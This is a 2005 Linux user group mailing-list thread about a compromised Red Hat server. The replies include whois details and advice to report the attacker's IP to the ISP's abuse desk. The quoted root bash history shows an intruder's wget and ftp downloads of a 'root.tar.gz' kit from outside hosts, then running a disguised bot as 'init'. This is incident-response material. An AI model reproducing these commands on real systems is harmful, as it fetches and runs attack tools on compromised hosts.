[wellylug] Think I've had a server hacked

Cliff Pratt enkidu at cliffp.com
Thu Oct 27 09:16:16 NZDT 2005


Good luck. It's Wanadoo, one of the biggest sources of SPAM 
on my lists.

Cheers,

Cliff

Jamie Baddeley wrote:
> at the very least you should try this:
> 
> % Information related to '82.123.175.0 - 82.123.175.255'
> 
> inetnum:      82.123.175.0 - 82.123.175.255
> netname:      IP2000-ADSL-BAS
> descr:        BSTUI152 Tuileries Bloc2
> country:      FR
> admin-c:      WITR1-RIPE
> tech-c:       WITR1-RIPE
> status:       ASSIGNED PA
> remarks:      for hacking, spamming or security problems send mail to
> remarks:      postmaster at wanadoo.fr AND abuse at wanadoo.fr
> mnt-by:       FT-BRX
> source:       RIPE # Filtered
> 
> 
> send them mail. Yes,  82.123.175.245 may simply be a compromised jump
> point, but it costs nothing to let them know.
> 
> jamie
> 
> 
> 
> On Wed, 2005-10-26 at 10:25 +1300, Mark Signal wrote:
> 
>>Hi
>>
>>I setup a box ages ago for a client - redhat 7.2/Mitel with only ssh port 
>>open
>>
>>root password just got changed and /var/log/auth deleted
>>last login from 82.123.175.245 (somewhere in europe - normally only 
>>connections from Lower Hutt :)
>>root bash history has..
>>w
>>passwd
>>uname -a
>>ps x
>>w
>>cd /var/tmp
>>ls
>>wget hash.idilis.ro/root.tar.gz
>>wget 217.156.85.3/root.tar.gz
>>fr hash.idilis.ro
>>ftp hash.idilis.ro
>>ftp 217.156.85.3
>>tar xzvf mech*
>>cd mech
>>mv bash init
>>PATH=:.PATH
>>init
>>init
>>init
>>
>>I am copying all the data off  (including /var/logs/) and will 
>>reinstall/update and shift ssh port
>>
>>is there anything else I can/should  do?
>>
>>cheers
>>
>>
>>Mark
>>
>>
>>
>>
>>-- 
>>No virus found in this outgoing message.
>>Checked by AVG Free Edition.
>>Version: 7.1.361 / Virus Database: 267.12.5/147 - Release Date: 24/10/2005
>>
> 
> 




More information about the wellylug mailing list